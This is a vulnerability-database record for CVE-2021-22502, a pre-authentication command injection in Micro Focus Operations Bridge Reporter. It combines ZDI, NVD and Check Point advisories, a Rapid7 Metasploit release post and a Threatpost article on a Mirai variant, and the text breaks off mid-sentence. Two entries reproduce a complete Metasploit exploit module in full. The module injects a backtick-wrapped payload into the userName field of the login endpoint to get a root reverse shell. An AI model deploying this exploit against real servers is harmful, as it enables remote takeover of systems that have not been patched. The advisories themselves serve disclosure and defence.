{"zdi": [{"lastseen": "2022-01-31T22:28:05", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Micro Focus Operations Bridge Reporter. Authentication is not required to exploit this vulnerability. The specific flaw exists within the handling of the userName parameter provided to the LogonResource endpoint. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of root.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-02-09T00:00:00", "type": "zdi", "title": "Micro Focus Operations Bridge Reporter userName Command Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22502"], "modified": "2021-02-09T00:00:00", "id": "ZDI-21-153", "href": "https://www.zerodayinitiative.com/advisories/ZDI-21-153/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:28:04", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Micro Focus Operations Bridge Reporter. Authentication is not required to exploit this vulnerability. The specific flaw exists within the handling of the Token parameter provided to the LogonResource endpoint. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of root.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-02-09T00:00:00", "type": "zdi", "title": "Micro Focus Operations Bridge Reporter Token Command Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22502"], "modified": "2021-06-29T00:00:00", "id": "ZDI-21-154", "href": "https://www.zerodayinitiative.com/advisories/ZDI-21-154/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2022-03-23T14:15:20", "description": "Remote Code execution vulnerability in Micro Focus Operation Bridge Reporter (OBR) product, affecting version 10.40. The vulnerability could be exploited to allow Remote Code Execution on the OBR server.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-08T22:15:00", "type": "cve", "title": "CVE-2021-22502", "cwe": ["CWE-94"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22502"], "modified": "2021-04-30T23:38:00", "cpe": ["cpe:/a:microfocus:operation_bridge_reporter:10.40"], "id": "CVE-2021-22502", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-22502", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microfocus:operation_bridge_reporter:10.40:*:*:*:*:*:*:*"]}], "checkpoint_advisories": [{"lastseen": "2022-02-16T19:33:39", "description": "A remote code execution vulnerability exists in Micro Focus Operations Bridge Reporter. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-04-05T00:00:00", "type": "checkpoint_advisories", "title": "Micro Focus Operations Bridge Reporter Remote Code Execution (CVE-2021-22502)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22502"], "modified": "2021-04-05T00:00:00", "id": "CPAI-2021-0158", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2021-04-30T15:30:58", "description": "", "cvss3": {}, "published": "2021-04-30T00:00:00", "type": "packetstorm", "title": "Micro Focus Operations Bridge Reporter Unauthenticated Command Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-22502"], "modified": "2021-04-30T00:00:00", "id": "PACKETSTORM:162408", "href": "https://packetstormsecurity.com/files/162408/Micro-Focus-Operations-Bridge-Reporter-Unauthenticated-Command-Injection.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Micro Focus Operations Bridge Reporter Unauthenticated Command Injection', \n'Description' => %q{ \nThis module exploits a command injection vulnerability on *login* (yes, you read that right) \nthat affects Micro Focus Operations Bridge Reporter on Linux, versions 10.40 and below. \nIt's a straight up command injection, with little escaping required and it works before \nauthentication. \nThis module has been tested on the Linux 10.40 version. Older versions might be affected, \ncheck the advisory for details. \n}, \n'Author' => \n[ \n'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability discovery and MSF module \n], \n'License' => MSF_LICENSE, \n'References' => \n[ \n['CVE', '2021-22502'], \n['ZDI', '21-153'], \n['URL', 'https://github.com/pedrib/PoC/blob/master/advisories/Micro_Focus/Micro_Focus_OBR.md'], \n['URL', 'https://softwaresupport.softwaregrp.com/doc/KM03775947'] \n], \n'Platform' => 'unix', \n'Arch' => ARCH_CMD, \n'Privileged' => true, \n'Payload' => \n{ \n'Space' => 1024, # This should be a safe value, it might take much more \n'DisableNops' => true, \n# avoid null char and the injection char (`) \n'BadChars' => \"\\x00\\x60\", \n'Compat' => \n{ \n'PayloadType' => 'cmd', \n# all of these (and more) should exist in a standard RHEL / SuSE \n# ... which are the only two distros supported by Micro Focus OBR \n# (telnet doesn't seem to work though) \n# \n# all reverse shells were tested and work flawlessly \n'RequiredCmd' => 'netcat openssl generic python' \n} \n}, \n'Targets' => \n[ \n[ 'Micro Focus Operations Bridge Reporter (Linux) versions <= 10.40', {} ], \n], \n'DefaultTarget' => 0, \n'DisclosureDate' => '2021-02-09' \n) \n) \n \nregister_options( \n[ \n# normal (no SSL) port is 21411 \nOpt::RPORT(21412), \nOptBool.new('SSL', [true, 'Negotiate SSL/TLS', true]), \nOptString.new('TARGETURI', [true, 'Application path', '/']) \n] \n) \nend \n \ndef check \nres = send_request_raw({ \n'method' => 'POST', \n'uri' => normalize_uri(datastore['TARGETURI'], '/AdminService/urest/v1/LogonResource'), \n'headers' => { 'Content-Type' => 'application/json' }, \n'data' => rand_text_alpha(10..64) \n}, 10) \n \nif res && res.code == 400 && res.body.include?('Unrecognized token') \n# should return a stack trace like \n# Unrecognized token '#{data}': was expecting ('true', 'false' or 'null') \n# at [Source: org.glassfish.jersey.message.internal.ReaderInterceptorExecutor$UnC (...) \nreturn Exploit::CheckCode::Detected \nend \n \nreturn Exploit::CheckCode::Unknown \nend \n \ndef exploit \n# if there are any 0x22 (\") chars in the encoded payload, escape them with a backslash \n# we have to do this manually, the encoder is not smart enough to do it, and it will \n# fail if we put 0x22 as a bad char above \npayload_enc = payload.encoded.gsub('\"', '\\\\\"') \n \n# we use 0x60 (`) for injection, but there are lots of other possibilities \ndata = \"{\\\"userName\\\":\\\"#{rand_text_alpha(1..16)}`#{payload_enc}`\\\",\\\"credential\\\":\\\"#{rand_text_alpha(8..20)}\\\"}\" \n \nsend_request_raw({ \n'method' => 'POST', \n'uri' => normalize_uri(datastore['TARGETURI'], '/AdminService/urest/v1/LogonResource'), \n'headers' => { 'Content-Type' => 'application/json' }, \n'data' => data \n}, 0) \n \n# it's tricky to check the return value of the request here \n# - it might hang (no return) and give us a shell \n# - it might return 400 or 500 and give us a shell \n# - it might return 400 or 500 and give us nothing \n# so ignore it altogether and hope for the best \nprint_status(\"#{peer} - Payload sent, now wait for Shelly, if she doesn't arrive try again!\") \nend \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/162408/microfocus_obr_cmd_injection.rb.txt", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2021-12-19T03:20:07", "description": "This Metasploit module exploits a command injection vulnerability on login that affects Micro Focus Operations Bridge Reporter on Linux, versions 10.40 and below. It is a straight up command injection, with little escaping required, and it works before authentication. This module has been tested on the Linux 10.40 version.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-04-30T00:00:00", "type": "zdt", "title": "Micro Focus Operations Bridge Reporter Unauthenticated Command Injection Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22502"], "modified": "2021-04-30T00:00:00", "id": "1337DAY-ID-36171", "href": "https://0day.today/exploit/description/36171", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Micro Focus Operations Bridge Reporter Unauthenticated Command Injection',\n 'Description' => %q{\n This module exploits a command injection vulnerability on *login* (yes, you read that right)\n that affects Micro Focus Operations Bridge Reporter on Linux, versions 10.40 and below.\n It's a straight up command injection, with little escaping required and it works before\n authentication.\n This module has been tested on the Linux 10.40 version. Older versions might be affected,\n check the advisory for details.\n },\n 'Author' =>\n [\n 'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability discovery and MSF module\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2021-22502'],\n ['ZDI', '21-153'],\n ['URL', 'https://github.com/pedrib/PoC/blob/master/advisories/Micro_Focus/Micro_Focus_OBR.md'],\n ['URL', 'https://softwaresupport.softwaregrp.com/doc/KM03775947']\n ],\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Privileged' => true,\n 'Payload' =>\n {\n 'Space' => 1024, # This should be a safe value, it might take much more\n 'DisableNops' => true,\n # avoid null char and the injection char (`)\n 'BadChars' => \"\\x00\\x60\",\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n # all of these (and more) should exist in a standard RHEL / SuSE\n # ... which are the only two distros supported by Micro Focus OBR\n # (telnet doesn't seem to work though)\n #\n # all reverse shells were tested and work flawlessly\n 'RequiredCmd' => 'netcat openssl generic python'\n }\n },\n 'Targets' =>\n [\n [ 'Micro Focus Operations Bridge Reporter (Linux) versions <= 10.40', {} ],\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => '2021-02-09'\n )\n )\n\n register_options(\n [\n # normal (no SSL) port is 21411\n Opt::RPORT(21412),\n OptBool.new('SSL', [true, 'Negotiate SSL/TLS', true]),\n OptString.new('TARGETURI', [true, 'Application path', '/'])\n ]\n )\n end\n\n def check\n res = send_request_raw({\n 'method' => 'POST',\n 'uri' => normalize_uri(datastore['TARGETURI'], '/AdminService/urest/v1/LogonResource'),\n 'headers' => { 'Content-Type' => 'application/json' },\n 'data' => rand_text_alpha(10..64)\n }, 10)\n\n if res && res.code == 400 && res.body.include?('Unrecognized token')\n # should return a stack trace like\n # Unrecognized token '#{data}': was expecting ('true', 'false' or 'null')\n # at [Source: org.glassfish.jersey.message.internal.ReaderInterceptorExecutor$UnC (...)\n return Exploit::CheckCode::Detected\n end\n\n return Exploit::CheckCode::Unknown\n end\n\n def exploit\n # if there are any 0x22 (\") chars in the encoded payload, escape them with a backslash\n # we have to do this manually, the encoder is not smart enough to do it, and it will\n # fail if we put 0x22 as a bad char above\n payload_enc = payload.encoded.gsub('\"', '\\\\\"')\n\n # we use 0x60 (`) for injection, but there are lots of other possibilities\n data = \"{\\\"userName\\\":\\\"#{rand_text_alpha(1..16)}`#{payload_enc}`\\\",\\\"credential\\\":\\\"#{rand_text_alpha(8..20)}\\\"}\"\n\n send_request_raw({\n 'method' => 'POST',\n 'uri' => normalize_uri(datastore['TARGETURI'], '/AdminService/urest/v1/LogonResource'),\n 'headers' => { 'Content-Type' => 'application/json' },\n 'data' => data\n }, 0)\n\n # it's tricky to check the return value of the request here\n # - it might hang (no return) and give us a shell\n # - it might return 400 or 500 and give us a shell\n # - it might return 400 or 500 and give us nothing\n # so ignore it altogether and hope for the best\n print_status(\"#{peer} - Payload sent, now wait for Shelly, if she doesn't arrive try again!\")\n end\nend\n", "sourceHref": "https://0day.today/exploit/36171", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "rapid7blog": [{"lastseen": "2021-05-14T14:54:19", "description": "## Two new Active Directory attacks\n\n\n\nThis week we added [a pair of new post-exploitation modules](<https://github.com/rapid7/metasploit-framework/pull/11130>) from community contributor [timb-machine](<https://github.com/timb-machine>). Both modules target UNIX machines running SSSD or One Identity's Vintela Authentication Services (VAS) as Active Directory integration solutions. The new [UNIX Gather Cached AD Hashes](<https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/post/multi/gather/unix_cached_ad_hashes.md>) module can be used on a UNIX target to obtain all cached Active Directory hashes, which can then be cracked using John the Ripper. The second module is [UNIX Gather Kerberos Tickets](<https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/post/multi/gather/unix_kerberos_tickets.md>), which as the name suggests, can similarly be used on a vulnerable target to obtain cached Kerberos tickets.\n\n## Focusing on Micro Focus\n\nThanks to [pedrib](<https://github.com/pedrib>) for two new pull requests related to Micro Focus Operations Bridge Manager and Bridge Reporter. Pedrib contributed a new [Micro Focus Operations Bridge Reporter Unauthenticated Command Injection ](<https://github.com/rapid7/metasploit-framework/pull/15090>) module, which exploits an unauthenticated command injection vulnerability on Linux, versions 10.40 and below ([CVE-2021-22502](<https://attackerkb.com/topics/lGSaEhn81Z/cve-2021-22502?referrer=blog>)). Pedrib also [updated](<https://github.com/rapid7/metasploit-framework/pull/15087>) the existing [Micro Focus Operations Bridge Manager Local Privilege Escalation](<https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/windows/local/microfocus_operations_privesc.md>) module to also support Operations Bridge Reporter.\n\n## PR #15000!\n\nCongratulations to [pingport80](<https://github.com/pingport80>), who snagged [PR #15,000](<https://github.com/rapid7/metasploit-framework/pull/15000>)! This enhancement replaces existing usages of `which` in `Msf::Sessions::CommandShell.binary_exists` with `command -v` \u2014 a more portable solution that works consistently across different shells.\n\n## New Module Content (6)\n\n * [GravCMS Remote Command Execution](<https://github.com/rapid7/metasploit-framework/pull/15030>) by Mehmet Ince, which exploits [CVE-2021-21425](<https://attackerkb.com/topics/DXBeSBbvfn/cve-2021-21425?referrer=blog>) \\- This adds a new remote exploit module that leverages unauthenticated arbitrary YAML write/update vulnerability to get remote code execution under the context of the web server user. This vulnerability has been fixed in the admin component version 1.10.10, which was released with GravCMS version 1.7.9.\n * [Micro Focus Operations Bridge Reporter Unauthenticated Command Injection](<https://github.com/rapid7/metasploit-framework/pull/15090>) by Pedro Ribeiro, which exploits [CVE-2021-22502](<https://attackerkb.com/topics/lGSaEhn81Z/cve-2021-22502?referrer=blog>). This is an unauthenticated OS command injection vulnerability in the Micro Focus Operations Bridge Reporter.\n * [IGEL OS Secure VNC/Terminal Command Injection RCE](<https://github.com/rapid7/metasploit-framework/pull/14947>) by James Brytan, James Smith, Marisa Mack, Rob Vinson, Sergey Pashevkin, and Steven Laura - This adds a new module that exploits an unauthenticated command injection vulnerability in the Secure Terminal and Secure Shadow services in various versions of IGEL OS.\n * [Google Chrome versions before 89.0.4389.128 V8 XOR Typer Out-Of-Bounds Access RCE](<https://github.com/rapid7/metasploit-framework/pull/15105>) by Bruno Keith (bkth_), Grant Willcox (tekwizz123), Niklas Baumstark (_niklasb), and Rajvardhan Agarwal (r4j0x00), which exploits [CVE-2021-21220](<https://attackerkb.com/topics/guR2zJ2y2K/cve-2021-21220?referrer=blog>) \\- This adds an exploit module for a Chrome V8 XOR typer OOB Access RCE that was found in the 2021 Pwn2Own competition by Dataflow Security's Niklas Baumstark (@niklasb) and Bruno Keith (@bkth). \nNote that this module will require you to run Chrome without the sandbox enabled as it does not come with a sandbox escape.\n * [UNIX Gather Cached AD Hashes](<https://github.com/rapid7/metasploit-framework/pull/11130>) by Tim Brown - Retrieves cached Active Directory credentials from two different solutions on UNIX (SSSD and VAS).\n * [UNIX Gather Kerberos Tickets](<https://github.com/rapid7/metasploit-framework/pull/11130>) by Tim Brown - Retrieves cached Kerberos tickets from two different solutions on UNIX (SSSD and VAS).\n\n## Enhancements and features\n\n * [#14831](<https://github.com/rapid7/metasploit-framework/pull/14831>) from [agalway-r7](<https://github.com/agalway-r7>) \\- Updates the HttpClient mixin with a new cookie jar implementation which correctly updates and merges the `Set-Cookie` header responses when using the `send_request_cgi` `keep_cookies` option\n * [#15000](<https://github.com/rapid7/metasploit-framework/pull/15000>) from [pingport80](<https://github.com/pingport80>) \\- Replaces the use of the `which` command with `command -v` giving us a more portable solution\n * [#15087](<https://github.com/rapid7/metasploit-framework/pull/15087>) from [pedrib](<https://github.com/pedrib>) \\- The `exploit/windows/local/microfocus_operations_privesc` module now supports both vulnerable Operations Bridge Manager installations and vulnerable Operations Bridge Reporter installations, with the new additional target being Operations Bridge Reporter.\n * [#15096](<https://github.com/rapid7/metasploit-framework/pull/15096>) from [pingport80](<https://github.com/pingport80>) \\- This adds shell session support to the `post/windows/gather/checkvm` module. This also notably adds cross-platform support for getting a list of running processes using shell and Meterpreter sessions.\n * [#15136](<https://github.com/rapid7/metasploit-framework/pull/15136>) from [pedrib](<https://github.com/pedrib>) \\- Update the `exploit/multi/http/microfocus_ucmdb_unauth_deser` module default Linux payload from `cmd/unix/generic` to `cmd/unix/reverse_python`.\n * [#15138](<https://github.com/rapid7/metasploit-framework/pull/15138>) from [h00die](<https://github.com/h00die>) \\- This enhances the `auxiliary/scanner/http/dell_idrac` module by cleaning up the code, adding the `last_attempted_at` field to `create_credential_login` to prevent a crash, and adding documentation for the module.\n\n## Bugs Fixed\n\n * [#15111](<https://github.com/rapid7/metasploit-framework/pull/15111>) from [timwr](<https://github.com/timwr>) \\- This fixes an issue in how some Meterpreter session types would inconsistently run commands issued through `sessions -c`.\n * [#15116](<https://github.com/rapid7/metasploit-framework/pull/15116>) from [jmartin-r7](<https://github.com/jmartin-r7>) \\- This fixes a bug that would occur when importing newer Acunetix reports into the database due to a change in how the timestamp is formatted.\n * [#15120](<https://github.com/rapid7/metasploit-framework/pull/15120>) from [pedrib](<https://github.com/pedrib>) \\- Fixes a regression within `tools/modules/module_author.rb ` so that it runs without crashing\n * [#15140](<https://github.com/rapid7/metasploit-framework/pull/15140>) from [wvu-r7](<https://github.com/wvu-r7>) \\- `msftidy_docs.rb` now doesn't double warn on optional (and missing) `Options` headers.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` \nand you can get more details on the changes since the last blog post from \nGitHub:\n\n * [Pull Requests 6.0.42...6.0.43](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222021-04-29T10%3A54%3A48-05%3A00..2021-05-05T09%3A27%3A49-04%3A00%22>)\n * [Full diff 6.0.42...6.0.43](<https://github.com/rapid7/metasploit-framework/compare/6.0.42...6.0.43>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. \nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the \n[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {}, "published": "2021-05-07T19:41:01", "type": "rapid7blog", "title": "Metasploit Wrap-Up", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-21220", "CVE-2021-21425", "CVE-2021-22502"], "modified": "2021-05-07T19:41:01", "id": "RAPID7BLOG:C2CC0386EE87831FE7800DF7026FCE2D", "href": "https://blog.rapid7.com/2021/05/07/metasploit-wrap-up-110/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2021-03-17T20:47:24", "description": "A new variant of the Mirai botnet has been discovered targeting a slew of vulnerabilities in unpatched D-Link, Netgear and SonicWall devices \u2014 as well as never-before-seen flaws in unknown internet-of-things (IoT) gadgets.\n\nSince Feb. 16, the new variant has been targeting six known vulnerabilities \u2013 and three previously unknown ones \u2013 in order to infect systems and add them to a botnet. It\u2019s only the latest variant of Mirai [to come to light](<https://threatpost.com/new-mirai-variant-mukashi-targets-zyxel-nas-devices/153982/>), years after source code for the malware [was released](<https://threatpost.com/source-code-released-for-mirai-ddos-malware/121039/>) in October 2016.\n\n\u201cThe attacks are still ongoing at the time of this writing,\u201d said researchers with Palo Alto Networks\u2019 Unit 42 team [on Monday](<https://unit42.paloaltonetworks.com/mirai-variant-iot-vulnerabilities/>). \u201cUpon successful exploitation, the attackers try to download a malicious shell script, which contains further infection behaviors such as downloading and executing Mirai variants and brute-forcers.\u201d\n\n## **Initial Exploit: New and Old Flaws**\n\nThe attacks leverage a number of vulnerabilities. The known vulnerabilities exploited include: A SonicWall SSL-VPN exploit; a D-Link DNS-320 firewall exploit ([CVE-2020-25506](<https://nvd.nist.gov/vuln/detail/CVE-2020-25506>)); Yealink Device Management remote code-execution (RCE) flaws ([CVE-2021-27561 and CVE-2021-27562](<https://ssd-disclosure.com/ssd-advisory-yealink-dm-pre-auth-root-level-rce/>)); a Netgear ProSAFE Plus RCE flaw ([CVE-2020-26919](<https://nvd.nist.gov/vuln/detail/CVE-2020-26919>)); an RCE flaw in Micro Focus Operation Bridge Reporter ([CVE-2021-22502](<https://github.com/pedrib/PoC/blob/master/advisories/Micro_Focus/Micro_Focus_OBR.md>)); and a Netis WF2419 wireless router exploit ([CVE-2019-19356](<https://nvd.nist.gov/vuln/detail/CVE-2019-19356>) ).\n\nPatches are available for all of these flaws; the botnet is targeting devices that have not yet applied the available updates.\n\nFor instance, \u201cthe VisualDoor exploit in question targets an old SSL-VPN firmware vulnerability that was patched on legacy products in 2015 with 7.5.1.4-43sv and 8.0.0.4-25sv releases,\u201d a SonicWall spokesperson told Threatpost. \u201cIt is not viable against any properly patched SonicWall appliances.\u201d\n\nThe botnet also exploited vulnerabilities that were not previously identified. Researchers believe that these flaws exist in IoT devices.\n\n\u201cWe cannot say with certainty what the targeted devices are for the unidentified exploits,\u201d Zhibin Zhang, principal researcher for Unit 42, told Threatpost. \u201cHowever, based off of the other known exploits in the samples, as well as the nature of exploits historically selected to be incorporated with Mirai, it is highly probable they target IoT devices.\u201d\n\nThe exploits themselves include two RCE attacks \u2014 including an exploit targeting a command-injection vulnerability in certain components; and an exploit targeting the Common Gateway Interface (CGI) login script (stemming from a key parameter not being properly sanitized). The third exploit targets the op_type parameter, which is not properly sanitized leading to a command injection, said researchers.\n\nThe latter has \u201cbeen observed in the past being [used by [the] Moobot [botnet]](<https://threatpost.com/mootbot-fiber-routers-zero-days/154962/>), however the exact target is unknown,\u201d researchers noted. Threatpost has reached out to researchers for further information on these unknown targets.\n\n## **Mirai Botnet: A Set of Binaries**\n\nAfter initial exploitation, the malware invokes the wget utility (a legitimate program that retrieves content from web servers) in order to download a shell script from the malware\u2019s infrastructure. The shell script then downloads several Mirai binaries and executes them, one-by-one.\n\nOne such binary includes lolol.sh, which has multiple functions. Lolol.sh deletes key folders from the target machine (including ones with existing scheduled jobs and startup scripts); creates packet filter rules to bar incoming traffic directed at the commonly-used SSH, HTTP and telnet ports (to make remote access to the affected system more challenging for admins); and schedules a job that aims to rerun the lolol.sh script every hour (for persistence). Of note, this latter process is flawed, said researchers, as the cron configuration is incorrect.\n\nAnother binary (install.sh) downloads various files and packages \u2013 including GoLang v1.9.4, the \u201cnbrute\u201d binaries (that [brute-force various credentials](<https://threatpost.com/millions-brute-force-attacks-rdp/155324/>)) and the combo.txt file (which contains numerous credential combinations, to be used for brute-forcing by \u201cnbrute\u201d).\n\nThe final binary is called dark.[arch], and is based on the Mirai codebase. This binary mainly functions for propagation, either via the various initial Mirai exploits described above, or via brute-forcing SSH connections using hardcoded credentials in the binary.\n\n## **Mirai Variants Continue to Pop Up**\n\nThe variant is only the latest to rely on Mirai\u2019s source code, [which has proliferated into more than 60 variants](<https://threatpost.com/mirai-botnet-sees-big-2019-growth-shifts-focus-to-enterprises/146547/>) since bursting on the scene with a massive distributed denial of service (DDoS) [takedown of DNS provider Dyn](<https://threatpost.com/dyn-confirms-ddos-attack-affecting-twitter-github-many-others/121438/>) in 2016.\n\nLast year, a Mirai variant was found [targeting Zyxel network-attached storage (NAS) devices](<https://threatpost.com/new-mirai-variant-mukashi-targets-zyxel-nas-devices/153982/>) using a critical vulnerability that was only recently discovered, according to security researchers. In 2019, [a variant of the botnet](<https://threatpost.com/mirai-enterprise-systems/142889/>) was found sniffing out and targeting vulnerabilities in enterprise wireless presentation and display systems. And, a 2018 variant [was used to launch a series of DDoS campaigns](<https://threatpost.com/mirai-variant-targets-financial-sector-with-iot-ddos-attacks/131056/>) against financial-sector businesses.\n\nResearchers said that the biggest takeaway here is that connected devices continue to pose a security problem for users. They strongly advised customers to apply patches whenever possible.\n\n\u201cThe IoT realm remains an easily accessible target for attackers,\u201d according to Unit 42\u2019s report. \u201cMany vulnerabilities are very easy to exploit and could, in some cases, have catastrophic consequences.\u201d\n\n**_Check out our free [upcoming live webinar events](<https://threatpost.com/category/webinars/>) \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community:_**\n\n * March 24: **Economics of 0-Day Disclosures: The Good, Bad and Ugly **([Learn more and register!](<https://threatpost.com/webinars/economics-of-0-day-disclosures-the-good-bad-and-ugly/>))\n * April 21: **Underground Markets: A 